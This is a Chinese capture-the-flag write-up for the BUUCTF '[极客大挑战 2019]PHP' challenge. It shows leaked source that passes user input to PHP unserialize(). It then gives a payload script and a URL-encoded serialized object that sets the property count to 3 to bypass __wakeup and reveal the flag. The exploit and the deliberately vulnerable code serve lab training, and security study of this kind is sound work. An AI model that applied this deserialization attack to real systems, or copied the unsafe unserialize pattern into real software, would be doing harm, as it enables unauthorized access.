BUUCTF靶场16 --[极客大挑战 2019]PHP

mind

BUUCTF靶场16 --[极客大挑战 2019]PHP 考察点： 题目提示有备份,那就应该有一个目录提供源码下载。扫了一下，有一个www.zip文件，下载。 zip里面有5个文件 [Plain Text] 纯文本查看 复制代码 class.php flag.php index.js index.php style.css index.php [PHP] 纯文本查看 复制代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> class.php [PHP] 纯文本查看 复制代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can't give you the flag!"; die(); } } } ?> flag.php [PHP] 纯文本查看 复制代码 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 构造payload [PHP] 纯文本查看 复制代码 <?php class Name{ private $username = 'admin'; private $password = '100'; } $a = new Name(); $b = serialize($a); echo $b."<br>"; $c = urlencode(serialize($a)); echo $c; ?> [Plain Text] 纯文本查看 复制代码 O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D flag{ee2e810f-a59e-466c-9e72-d99136525e9e} 总结： 本题的考察点：PHP魔法函数 注意点：做CTF题不要忽视任何线索，包括每一句上面的 提示文字。